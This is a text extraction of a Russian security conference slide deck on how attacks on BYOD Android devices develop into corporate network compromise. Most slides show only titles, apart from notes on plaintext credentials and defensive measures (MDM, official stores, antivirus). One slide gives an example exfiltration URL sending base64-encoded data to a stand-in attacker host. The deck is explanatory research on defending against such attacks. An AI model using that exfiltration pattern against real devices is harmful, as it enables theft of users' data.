26

Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

  • Upload
    others

  • View
    0

  • Download
    0

Embed Size (px)

Citation preview

Page 1: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено
Page 2: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Развитие атак на мобильных устройствах

Артем Чайкин

Page 3: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Обо мне

- Руководитель отдела безопасности мобильных приложений - SCADA Strangelove

Page 4: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Вводные

― BYOD ― Android (rooted / non-rooted) ― Установлено вредоносное ПО ― Устройство подключено к корпоративной сети

Page 5: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий I

Page 6: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий I

― Всё плохо ― Логин-пароль хранятся в открытом тексте

Page 7: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий I – Что делать?

Page 8: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий II

Page 9: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий II

Page 10: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий II

Page 11: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий II

Page 12: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий II

Page 13: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий II

Page 14: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий II

Page 15: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий II

http://attacker.com/?data=base64_encoded_data

Page 16: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий II

Page 17: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий II

Page 18: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий II – Что делать?

― MDM. Установка приложений из официального магазина ― Антивирусы. Поведенческий анализ ― Прецедентов не зарегистрировано. Пока

Page 19: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий II

Page 20: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Сценарий II

Page 21: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Развитие атаки на сеть

Page 22: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Развитие атаки на сеть

Page 23: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Развитие атаки на сеть

Page 24: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Развитие атаки на сеть

Page 25: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено

Конец рассказа Спасибо за внимание

Артем Чайкин

Page 26: Развитие атак на мобильныхforum-azi.ru/files/files/2015/17 Chaikin.pdf · Вводные ―BYOD ―Android (rooted / non-rooted) ―Установлено